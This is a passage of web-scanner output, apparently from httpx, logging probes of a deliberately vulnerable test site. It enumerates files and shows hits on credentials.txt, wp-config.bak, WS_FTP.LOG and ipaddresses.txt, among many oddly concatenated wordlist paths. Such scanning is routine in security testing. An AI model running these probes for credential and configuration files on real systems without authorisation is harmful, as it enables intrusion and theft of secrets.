"input\":\"http://testphp.vulnweb.com/pictures/5.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/5.jpg\",\"time\":\"357.926233ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":76,\"lines\":76,\"status_code\":200,\"content_length\":14228,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:21.611207856Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg\\u0026size=160\",\"input\":\"http://testphp.vulnweb.com/pictures/5.jpg\\u0026size=160\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/5.jpg\\u0026size=160\",\"time\":\"352.348396ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:21.798976987Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/5.jpg.tn\",\"time\":\"344.157643ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":14,\"lines\":28,\"status_code\":200,\"content_length\":4428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:22.277673562Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg\",\"input\":\"http://testphp.vulnweb.com/pictures/6.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/6.jpg\",\"time\":\"343.837332ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":48,\"lines\":56,\"status_code\":200,\"content_length\":11465,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:22.396242517Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg\\u0026size=160\",\"input\":\"http://testphp.vulnweb.com/pictures/6.jpg\\u0026size=160\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/6.jpg\\u0026size=160\",\"time\":\"352.277862ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:24.075323971Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/6.jpg.tn\",\"time\":\"360.31723ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":30,\"lines\":32,\"status_code\":200,\"content_length\":4345,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:25.349462206Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg\",\"input\":\"http://testphp.vulnweb.com/pictures/7.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/7.jpg\",\"time\":\"536.169011ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":100,\"lines\":81,\"status_code\":200,\"content_length\":19219,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:25.394016397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg\\u0026size=160\",\"input\":\"http://testphp.vulnweb.com/pictures/7.jpg\\u0026size=160\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/7.jpg\\u0026size=160\",\"time\":\"343.722482ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:25.720635599Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/7.jpg.tn\",\"time\":\"356.527813ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":32,\"status_code\":200,\"content_length\":6458,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:26.595754414Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"input\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/8.jpg.tn\",\"time\":\"356.867636ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":23,\"lines\":26,\"status_code\":200,\"content_length\":4139,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:26.599350032Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/A01\",\"input\":\"http://testphp.vulnweb.com/pictures/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/A01\",\"time\":\"351.399051ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:26.64446132Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/WS_FTP.LOG\",\"input\":\"http://testphp.vulnweb.com/pictures/WS_FTP.LOG\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/WS_FTP.LOG\",\"time\":\"342.985993ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":64,\"lines\":10,\"status_code\":200,\"content_length\":771,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:26.647192079Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/Attack\",\"input\":\"http://testphp.vulnweb.com/pictures/Attack\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/Attack\",\"time\":\"355.94895ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:26.940763673Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg\",\"input\":\"http://testphp.vulnweb.com/pictures/8.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/8.jpg\",\"time\":\"691.367954ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":233,\"lines\":241,\"status_code\":200,\"content_length\":50299,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.015778007Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/creden\",\"input\":\"http://testphp.vulnweb.com/pictures/creden\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/creden\",\"time\":\"342.410242ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.016610231Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/c\",\"input\":\"http://testphp.vulnweb.com/pictures/c\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/c\",\"time\":\"342.749742ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.094782818Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txt\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txt\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txt\",\"time\":\"343.521069ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.142390243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txt2\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txt2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txt2\",\"time\":\"348.738153ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.233175915Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txt2Database\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txt2Database\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txt2Database\",\"time\":\"343.769991ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.269686252Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txt2DatabaseManipulations\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txt2DatabaseManipulations\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txt2DatabaseManipulations\",\"time\":\"352.55143ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.336283208Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txt2DatabaseManipulationsSQL\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txt2DatabaseManipulationsSQL\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txt2DatabaseManipulationsSQL\",\"time\":\"351.882316ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.426333783Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtA01\",\"time\":\"338.689424ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.474730494Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php\",\"time\":\"352.661939ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.572311383Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?pic=1\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?pic=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?pic=1\",\"time\":\"345.319362ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:27.65639497Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?pic=1A01\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?pic=1A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtA01http://testphp.vulnweb.com/product.php?pic=1A01\",\"time\":\"348.408252ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:30.88661774Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtAttack\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtAttack\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtAttack\",\"time\":\"347.75023ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:31.022500852Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtCurrent\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtCurrent\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtCurrent\",\"time\":\"346.833613ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:31.11770988Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtReferences:\",\"time\":\"343.788381ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:31.158219912Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:REFERENCES\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:REFERENCES\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtReferences:REFERENCES\",\"time\":\"356.009759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:31.504181219Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:REFERENCEShttps://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:REFERENCEShttps://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtReferences:REFERENCEShttps://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure\",\"time\":\"348.587175ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:31.931912078Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:REFERENCEShttps://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_ExposureVulnerability\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtReferences:REFERENCEShttps://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_ExposureVulnerability\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtReferences:REFERENCEShttps://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_ExposureVulnerability\",\"time\":\"348.537711ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:31.953172607Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtService:\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtService:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtService:\",\"time\":\"338.636959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:32.144925046Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/credentials.txtService:Username:\",\"input\":\"http://testphp.vulnweb.com/pictures/credentials.txtService:Username:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/credentials.txtService:Username:\",\"time\":\"342.243981ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:32.636690881Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/ipaddresses.txt\",\"input\":\"http://testphp.vulnweb.com/pictures/ipaddresses.txt\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/ipaddresses.txt\",\"time\":\"352.068103ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3,\"lines\":7,\"status_code\":200,\"content_length\":52,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:32.762743615Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/path-disclosure-unix.html\",\"input\":\"http://testphp.vulnweb.com/pictures/path-disclosure-unix.html\",\"title\":\"Pierre\\u0026Vacances\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/path-disclosure-unix.html\",\"time\":\"360.760868ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":291,\"lines\":59,\"status_code\":200,\"content_length\":3936,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:34.425768162Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/path-disclosure-win.html\",\"input\":\"http://testphp.vulnweb.com/pictures/path-disclosure-win.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/path-disclosure-win.html\",\"time\":\"346.624409ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":73,\"lines\":16,\"status_code\":200,\"content_length\":698,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:35.719661537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/pictures/wp-config.bak\",\"input\":\"http://testphp.vulnweb.com/pictures/wp-config.bak\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/wp-config.bak\",\"time\":\"357.294436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":207,\"lines\":32,\"status_code\":200,\"content_length\":1535,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:35.737281614Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/porn/\",\"input\":\"http://testphp.vulnweb.com/porn/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/porn/\",\"time\":\"338.42746ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:36.081931361Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/porn/1\",\"input\":\"http://testphp.vulnweb.com/porn/1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/porn/1\",\"time\":\"355.344085ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:36.950114182Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/porn/1L\",\"input\":\"http://testphp.vulnweb.com/porn/1L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/porn/1L\",\"time\":\"350.62517ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:36.959300599Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/porno/\",\"input\":\"http://testphp.vulnweb.com/porno/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/porno/\",\"time\":\"355.383499ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:36.996458243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/porno/1\",\"input\":\"http://testphp.vulnweb.com/porno/1\",\"title\":\"404 Not 